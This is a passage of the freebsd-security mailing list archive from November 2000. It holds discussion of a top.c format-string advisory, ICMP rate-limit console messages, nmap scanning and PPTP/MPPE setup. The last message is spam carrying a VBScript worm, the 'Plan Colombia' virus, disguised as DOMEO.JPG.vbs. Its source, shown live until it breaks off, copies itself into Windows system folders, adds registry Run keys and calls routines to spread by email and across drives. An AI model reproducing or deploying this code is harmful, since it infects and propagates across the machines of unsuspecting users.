odin.ac.hmc.edu (8.11.0/8.11.0) id eA1NdeD25276; Wed, 1 Nov 2000 15:39:40 -0800 Date: Wed, 1 Nov 2000 15:39:40 -0800 From: Brooks Davis To: Mitch Collinsworth Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top Message-ID: <20001101153940.A25149@Odin.AC.HMC.Edu> References: <20001101225954.E5B2C37B479@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from mitch@ccmr.cornell.edu on Wed, Nov 01, 2000 at 06:34:09PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 01, 2000 at 06:34:09PM -0500, Mitch Collinsworth wrote: > On Wed, 1 Nov 2000, FreeBSD Security Advisories wrote: > > > All released versions of FreeBSD prior to the correction date > > including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, > > but it was fixed in the 4.1.1-STABLE branch prior to the release of > > FreeBSD 4.2-RELEASE. > > There's a 4.2-RELEASE ?? It's in beta. I think the idea here was to indicate the first release which does not have this bug. I think that's a good policy (especialy close to a release date) since it lets people who only run releases know which one to run. -- Brooks -- Any statement of the form "X is the one, true Y" is FALSE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:41:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C079737B479 for ; Wed, 1 Nov 2000 15:41:25 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id eA1Nf4426570; Wed, 1 Nov 2000 15:41:04 -0800 (PST) Date: Wed, 1 Nov 2000 15:41:04 -0800 From: Alfred Perlstein To: Buliwyf McGraw Cc: security@FreeBSD.ORG Subject: Re: Console Message Message-ID: <20001101154104.J20567@fw.wintelcom.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from buliwyf@libertad.univalle.edu.co on Wed, Nov 01, 2000 at 06:46:47PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Buliwyf McGraw [001101 15:38] wrote: > > Hi... few days ago, i have a new message in my console, but i > dont know what it means or which program is generating this: > > icmp_request bandwidth limit 105/100 pps > icmp_request bandwidth limit 120/100 pps > icmp_request bandwidth limit 117/100 pps > icmp_request bandwidth limit 108/100 pps > > It is a security problem? It means something is hitting your machine with traffic that causes it to respond that is basically optional. like a ping flood. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:41:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 1E2FD37B4D7 for ; Wed, 1 Nov 2000 15:41:48 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id PAA32747; Wed, 1 Nov 2000 15:40:55 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda32745; Wed Nov 1 15:40:39 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id eA1NedN04054; Wed, 1 Nov 2000 15:40:39 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdih4037; Wed Nov 1 15:39:44 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id eA1Ndi515479; Wed, 1 Nov 2000 15:39:44 -0800 (PST) Message-Id: <200011012339.eA1Ndi515479@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdj14981; Wed Nov 1 15:38:44 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Mitch Collinsworth Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top In-reply-to: Your message of "Wed, 01 Nov 2000 18:34:09 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 01 Nov 2000 15:38:44 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Mitch Collinsworth writes: > On Wed, 1 Nov 2000, FreeBSD Security Advisories wrote: > > > All released versions of FreeBSD prior to the correction date > > including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, > > but it was fixed in the 4.1.1-STABLE branch prior to the release of > > FreeBSD 4.2-RELEASE. > > There's a 4.2-RELEASE ?? In about 14 days. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 15:44:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from starbug.ugh.net.au (starbug.ugh.net.au [203.31.238.37]) by hub.freebsd.org (Postfix) with ESMTP id 65E5437B479 for ; Wed, 1 Nov 2000 15:44:47 -0800 (PST) Received: by starbug.ugh.net.au (Postfix, from userid 1000) id 19C2AA859; Thu, 2 Nov 2000 10:44:45 +1100 (EST) Received: from localhost (localhost [127.0.0.1]) by starbug.ugh.net.au (Postfix) with ESMTP id 1350A5464 for ; Thu, 2 Nov 2000 09:44:45 +1000 (EST) Date: Thu, 2 Nov 2000 09:44:45 +1000 (EST) From: andrew@ugh.net.au To: security@freebsd.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top In-Reply-To: <20001101225954.E5B2C37B479@hub.freebsd.org> Message-ID: X-WonK: *wibble* MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 1 Nov 2000, FreeBSD Security Advisories wrote: > --- top.c 1999/01/09 20:20:34 1.4 > +++ top.c 2000/10/04 23:34:16 1.5 > @@ -807,7 +809,7 @@ > { > if ((errmsg = kill_procs(tempbuf2)) != NULL) > { > - new_message(MT_standout, errmsg); > + new_message(MT_standout, "%s", errmsg); > putchar('\r'); > no_command = Yes; > } What about line 827? It seems to suffer the same problem. Thanks, Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 16:44:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from post.webmailer.de (natmail2.webmailer.de [192.67.198.65]) by hub.freebsd.org (Postfix) with ESMTP id E291B37B4CF for ; Wed, 1 Nov 2000 16:44:19 -0800 (PST) Received: from umktgghc (host-209-214-45-203.mob.bellsouth.net [209.214.45.203]) by post.webmailer.de (8.9.3/8.8.7) with SMTP id BAA05151; Thu, 2 Nov 2000 01:43:13 +0100 (MET) Message-Id: <200011020043.BAA05151@post.webmailer.de> From: "Moritz Hardt" To: "Buliwyf McGraw" , "security@FreeBSD.ORG" Date: Wed, 01 Nov 2000 18:43:01 -0500 Reply-To: "Moritz Hardt" X-Mailer: PMMail 2000 Professional (2.10.2010) For Windows 98 (4.10.1998) In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Subject: Re: Console Message Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is generated by syslogd, if it is set up to print some messages on /dev/console. On Wed, 1 Nov 2000 18:46:47 -0500 (COT), Buliwyf McGraw wrote: > > Hi... few days ago, i have a new message in my console, but i > dont know what it means or which program is generating this: > > icmp_request bandwidth limit 105/100 pps > icmp_request bandwidth limit 120/100 pps > icmp_request bandwidth limit 117/100 pps > icmp_request bandwidth limit 108/100 pps > > It is a security problem? > >======================================================================= > Buliwyf McGraw > Administrador del Servidor Libertad > Centro de Servicios de Informacion > Universidad del Valle >======================================================================= > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 16:52:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from sunny.pacific.net.sg (sunny.pacific.net.sg [203.120.90.127]) by hub.freebsd.org (Postfix) with ESMTP id 3FAA337B479 for ; Wed, 1 Nov 2000 16:52:23 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by sunny.pacific.net.sg with ESMTP id eA20qCY13721; Thu, 2 Nov 2000 08:52:12 +0800 (SGT) Received: from garychang (spoff119.pacific.net.sg [203.120.94.119]) by pop1.pacific.net.sg with SMTP id IAA28857; Thu, 2 Nov 2000 08:52:11 +0800 (SGT) Message-ID: <000501c04466$e20b05a0$775e78cb@garychang> From: "James Lim" To: "Moritz Hardt" , "Buliwyf McGraw" , References: <200011020043.BAA05151@post.webmailer.de> Subject: Re: Console Message Date: Thu, 2 Nov 2000 08:50:23 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I suppose you did enable icmp_bandlim in ur kernel which restricts ICMP traffic to your system. THose error msgs shows that there are in excess icmp traffic. sysctl -a | grep bandlim You could change the settings to higher using sysctl -w Regards, James Lim ----- Original Message ----- From: "Moritz Hardt" To: "Buliwyf McGraw" ; Sent: Thursday, November 02, 2000 7:43 AM Subject: Re: Console Message > This is generated by syslogd, if it is set up to print some messages on /dev/console. > > On Wed, 1 Nov 2000 18:46:47 -0500 (COT), Buliwyf McGraw wrote: > > > > > Hi... few days ago, i have a new message in my console, but i > > dont know what it means or which program is generating this: > > > > icmp_request bandwidth limit 105/100 pps > > icmp_request bandwidth limit 120/100 pps > > icmp_request bandwidth limit 117/100 pps > > icmp_request bandwidth limit 108/100 pps > > > > It is a security problem? > > > >======================================================================= > > Buliwyf McGraw > > Administrador del Servidor Libertad > > Centro de Servicios de Informacion > > Universidad del Valle > >======================================================================= > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 17: 1:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id B180B37B4CF for ; Wed, 1 Nov 2000 17:01:49 -0800 (PST) Received: (qmail 30085 invoked by uid 1000); 2 Nov 2000 01:01:48 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Nov 2000 01:01:48 -0000 Date: Wed, 1 Nov 2000 19:01:48 -0600 (CST) From: Mike Silbersack To: James Lim Cc: Moritz Hardt , Buliwyf McGraw , security@FreeBSD.ORG Subject: Re: Console Message In-Reply-To: <000501c04466$e20b05a0$775e78cb@garychang> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 2 Nov 2000, James Lim wrote: > Hi, > > I suppose you did enable icmp_bandlim in ur kernel which restricts > ICMP traffic to your system. THose error msgs shows that there are in excess > icmp traffic. > sysctl -a | grep bandlim > > You could change the settings to higher using sysctl -w > > Regards, > James Lim There's little reason to raise the limit. Most likely he was seeing the rate limiting of RST packets caused by an nmap of his box. If he raises the limit, nmap will just scan faster next time. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 17: 5:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from sunny.pacific.net.sg (sunny.pacific.net.sg [203.120.90.127]) by hub.freebsd.org (Postfix) with ESMTP id 12A0937B4CF for ; Wed, 1 Nov 2000 17:05:43 -0800 (PST) Received: from pop1.pacific.net.sg (pop1.pacific.net.sg [203.120.90.85]) by sunny.pacific.net.sg with ESMTP id eA215fY16952; Thu, 2 Nov 2000 09:05:41 +0800 (SGT) Received: from garychang (spoff119.pacific.net.sg [203.120.94.119]) by pop1.pacific.net.sg with SMTP id JAA22071; Thu, 2 Nov 2000 09:05:41 +0800 (SGT) Message-ID: <001501c04468$c4570a20$775e78cb@garychang> From: "James Lim" To: "Mike Silbersack" Cc: "Moritz Hardt" , "Buliwyf McGraw" , References: Subject: Re: Console Message Date: Thu, 2 Nov 2000 09:03:49 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, Ok, point taken :) Regards, James Lim ----- Original Message ----- From: "Mike Silbersack" To: "James Lim" Cc: "Moritz Hardt" ; "Buliwyf McGraw" ; Sent: Thursday, November 02, 2000 9:01 AM Subject: Re: Console Message > > On Thu, 2 Nov 2000, James Lim wrote: > > > Hi, > > > > I suppose you did enable icmp_bandlim in ur kernel which restricts > > ICMP traffic to your system. THose error msgs shows that there are in excess > > icmp traffic. > > sysctl -a | grep bandlim > > > > You could change the settings to higher using sysctl -w > > > > Regards, > > James Lim > > There's little reason to raise the limit. Most likely he was seeing the > rate limiting of RST packets caused by an nmap of his box. If he raises > the limit, nmap will just scan faster next time. > > Mike "Silby" Silbersack > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 17:40:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 6B41D37B4C5 for ; Wed, 1 Nov 2000 17:40:41 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eA21gV822744; Wed, 1 Nov 2000 17:42:31 -0800 (PST) (envelope-from kris) Date: Wed, 1 Nov 2000 17:42:26 -0800 From: Kris Kennaway To: Brooks Davis Cc: Mitch Collinsworth , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top Message-ID: <20001101174226.A22706@citusc17.usc.edu> References: <20001101225954.E5B2C37B479@hub.freebsd.org> <20001101153940.A25149@Odin.AC.HMC.Edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="IS0zKkzwUGydFO0o" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001101153940.A25149@Odin.AC.HMC.Edu>; from brooks@one-eyed-alien.net on Wed, Nov 01, 2000 at 03:39:40PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --IS0zKkzwUGydFO0o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Nov 01, 2000 at 03:39:40PM -0800, Brooks Davis wrote: > > > All released versions of FreeBSD prior to the correction date > > > including 4.0, 4.1, 4.1.1 and 3.5.1 are vulnerable to this problem, > > > but it was fixed in the 4.1.1-STABLE branch prior to the release of > > > FreeBSD 4.2-RELEASE. > >=20 > > There's a 4.2-RELEASE ?? >=20 > It's in beta. I think the idea here was to indicate the first release > which does not have this bug. I think that's a good policy (especialy > close to a release date) since it lets people who only run releases know > which one to run. Yep. Even though saying "it's fixed in 4.1.1-STABLE" implies that it will be fixed in 4.2-RELEASE since 4.2 > 4.1.1, might as well make it explicit for people who don't really understand how RELENG_4 works. Kris --IS0zKkzwUGydFO0o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoAxoIACgkQWry0BWjoQKXAJACeJiVdAvBMTbH6S0Wc2BfLazup +8MAn35GdjL7zJW50B5yIBLeN0TSmEbp =4phc -----END PGP SIGNATURE----- --IS0zKkzwUGydFO0o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 17:54:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id 00FCE37B4C5 for ; Wed, 1 Nov 2000 17:54:40 -0800 (PST) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id RAA61624 for ; Wed, 1 Nov 2000 17:54:34 -0800 (PST) (envelope-from fbsd-security@ursine.com) Message-ID: <3A00C95A.15E4F8D6@ursine.com> Date: Wed, 01 Nov 2000 17:54:34 -0800 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:62.top References: <20001101225954.E5B2C37B479@hub.freebsd.org> <20001101153940.A25149@Odin.AC.HMC.Edu> <20001101174226.A22706@citusc17.usc.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > Yep. Even though saying "it's fixed in 4.1.1-STABLE" implies that it > will be fixed in 4.2-RELEASE since 4.2 > 4.1.1, might as well make it > explicit for people who don't really understand how RELENG_4 works. I for one greatly appreciate announcements being done this way, since the chance for confusion is much less. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 20: 6:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (unknown [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 5AF4337B4C5 for ; Wed, 1 Nov 2000 20:06:55 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eA246on34882; Wed, 1 Nov 2000 21:06:54 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA02808; Wed, 1 Nov 2000 21:06:49 -0700 (MST) Message-Id: <200011020406.VAA02808@harmony.village.org> To: "Moritz Hardt" Subject: Re: Installer Cc: "Andreas Alderud" , "Wes Peters" , "security@FreeBSD.ORG" In-reply-to: Your message of "Tue, 31 Oct 2000 19:04:02 EST." <200011010104.CAA13030@post.webmailer.de> References: <200011010104.CAA13030@post.webmailer.de> Date: Wed, 01 Nov 2000 21:06:49 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I posted scripts to -small a while ago that address this issue by allowing one to install smaller versions of FreeBSD w/o picobsd. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 20:47: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from inter.stack.ru (inter.stack.ru [212.20.57.225]) by hub.freebsd.org (Postfix) with ESMTP id DF01237B479 for ; Wed, 1 Nov 2000 20:46:57 -0800 (PST) Received: from exch.stack.ru (exch.stack.ru [212.20.57.217]) by inter.stack.ru (8.9.3/8.9.3) with ESMTP id LAA08261 for ; Thu, 2 Nov 2000 11:46:54 +0700 (KRS) Received: by exch.stack.ru with Internet Mail Service (5.5.2448.0) id ; Thu, 2 Nov 2000 11:46:54 +0700 Message-ID: <807044A67EA3D211B11D00A024E91A45F2D23C@exch.stack.ru> From: "Tolpanov, Dmitry" To: security@FreeBSD.ORG Subject: MPPE and US export restrictions. Date: Thu, 2 Nov 2000 11:46:53 +0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="koi8-r" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. I'm sorry if my question will be a little bit out of topic, but I think it is connected with security. I'm organizing PPTP service and interested in encryption of traffic. As PPTP server i'm using MPD port (mpd-3.2). I've installed it with MPPC and MPPE options (all necessary sources are included, as I understand). Now I start mpd with MPPC-MPPE options enabled. As PPTP client I have Win NT 4.0 Server. When I try to connect to PPTP server without enabled Encrypt option (NT) it is succeeded. But when I enable Encrypt option on NT the connection fails while everything is OK. Now I think may be my problems are because of US export restrictions, My NT and MPD simply do not support MPPE. I live in Russia. Recently US government canceled this restriction but my be my NT and FreeBSD(4.0) do not know about this. Dmitry. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 21:13:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from InterJet.dellroad.org (adsl-63-194-81-26.dsl.snfc21.pacbell.net [63.194.81.26]) by hub.freebsd.org (Postfix) with ESMTP id 3059B37B479 for ; Wed, 1 Nov 2000 21:13:34 -0800 (PST) Received: from curve.dellroad.org (curve.dellroad.org [10.1.1.30]) by InterJet.dellroad.org (8.9.1a/8.9.1) with ESMTP id VAA12322; Wed, 1 Nov 2000 21:13:26 -0800 (PST) Received: (from archie@localhost) by curve.dellroad.org (8.11.0/8.11.0) id eA25DQO57527; Wed, 1 Nov 2000 21:13:26 -0800 (PST) (envelope-from archie) From: Archie Cobbs Message-Id: <200011020513.eA25DQO57527@curve.dellroad.org> Subject: Re: MPPE and US export restrictions. In-Reply-To: <807044A67EA3D211B11D00A024E91A45F2D23C@exch.stack.ru> "from Tolpanov, Dmitry at Nov 2, 2000 11:46:53 am" To: "Tolpanov, Dmitry" Date: Wed, 1 Nov 2000 21:13:25 -0800 (PST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tolpanov, Dmitry writes: > I'm sorry if my question will be a little bit out of topic, but I think it > is connected with security. > I'm organizing PPTP service and interested in encryption of traffic. As PPTP > server i'm using MPD port (mpd-3.2). I've installed it with MPPC and MPPE > options (all necessary sources are included, as I understand). Now I start > mpd with MPPC-MPPE options enabled. > As PPTP client I have Win NT 4.0 Server. When I try to connect to PPTP > server without enabled Encrypt option (NT) it is succeeded. But when I > enable Encrypt option on NT the connection fails while everything is OK. > > Now I think may be my problems are because of US export restrictions, My NT > and MPD simply do not support MPPE. I live in Russia. Recently US government > canceled this restriction but my be my NT and FreeBSD(4.0) do not know about > this. The export stuff shouldn't be an issue. If you email me an mpd log trace I can tell you why it's failing. Make sure you enable option mpp-e128 if you're requiring "strong" encryption. -Archie __________________________________________________________________________ Archie Cobbs * Packet Design * http://www.packetdesign.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 1 23:42:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from sunsite.aubi.de (mail.aubi-online.de [62.159.82.131]) by hub.freebsd.org (Postfix) with ESMTP id 145C737B667; Wed, 1 Nov 2000 23:38:37 -0800 (PST) Received: from exchangeb.aubi.de (exchangeb.aubi.de [170.56.121.7]) by sunsite.aubi.de (8.9.3+Sun/8.9.3) with ESMTP id JAA23047; Thu, 2 Nov 2000 09:38:36 +0200 (GMT) Received: by exchangeb.aubi.de with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Nov 2000 09:34:52 -0000 Message-ID: <7B1EED0C5D58D411B73200508BDE77B204DD1E@exchangeb.aubi.de> From: Peter Wagner To: FreeBSD List Subject: US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.CO M)<= Date: Thu, 2 Nov 2000 09:34:51 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C044B0.26710D90" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C044B0.26710D90 Content-Type: text/plain VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.. ------_=_NextPart_000_01C044B0.26710D90 Content-Type: application/octet-stream; name="DOMEO.JPG.vbs" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="DOMEO.JPG.vbs" rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D rem "Plan Colombia" virus v1.0 rem by Sand Ja9e Gr0w (www.colombia.com) rem Dedicated to all the people that want to be hackers or crackers, = in Colombia =20 rem This program is also a protest act against the violence and = corruption that Colombia lives... rem I always wanting that all this finishes, I have said... rem Santa fe de Bogot=E1 2000/09 rem I dedicate to all you the song "GoodBye" of Andreas Bochelli rem = =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D rem Thanks God..! rem A greeting for "Lina Mar=EDa" from "Santa fe de Bogot=E1" rem A greeting for "Tizo" from "Spain" rem And One kicked of tail to my friends, "eL ChE" and "ThE SpY" rem okay, ok...=20 rem my baby start here... =20 On Error Resume Next dim = fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye eq=3D"" ctr=3D0 randomize numero =3D Int(Rnd * 3) + 1 polye =3D ".GIF.vbs" If numero =3D 1 Then polye =3D ".BMP.vbs" Else If numero =3D 2 Then polye =3D ".JPG.vbs" End If End If polyn=3D"\"&polyname(Int(Rnd * 5) + 4)&polye Set fso =3D CreateObject("Scripting.FileSystemObject") set file =3D fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=3Dfile.ReadAll main() If Day(Now) =3D 17 And Month(Now) =3D 9 Then MsgBox "Dedicated to my best brother=3D>Christiam Julian(C.J.G.S.)" & = Chr(13) & "Att. " & polyname(5) & " (M.H.M. TEAM)" killnet() End If sub main() On Error Resume Next dim wscr,rr set wscr=3DCreateObject("WScript.Shell") rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows = Scripting Host\Settings\Timeout") if (rr>=3D1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting = Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin =3D fso.GetSpecialFolder(0) Set dirsystem =3D fso.GetSpecialFolder(1) Set dirtemp =3D fso.GetSpecialFolder(2) Set c =3D fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LINUX32.vbs") c.Copy(dirwin&"\reload.vbs") c.Copy(dirsystem&polyn) regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread,res regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\LINUX3= 2",dirsystem&"\LINUX32.vbs" regcreate = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService= s\reload",dirwin&"\reload.vbs" downread=3D"" downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet = Explorer\Download Directory") if (downread=3D"") then downread=3D"c:\" end if rem acepta nombres largos..? if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then Randomize Randomize num =3D Int((4 * Rnd) + 1) rem fatal =3D> send virii if num =3D 2 then=20 regcreate 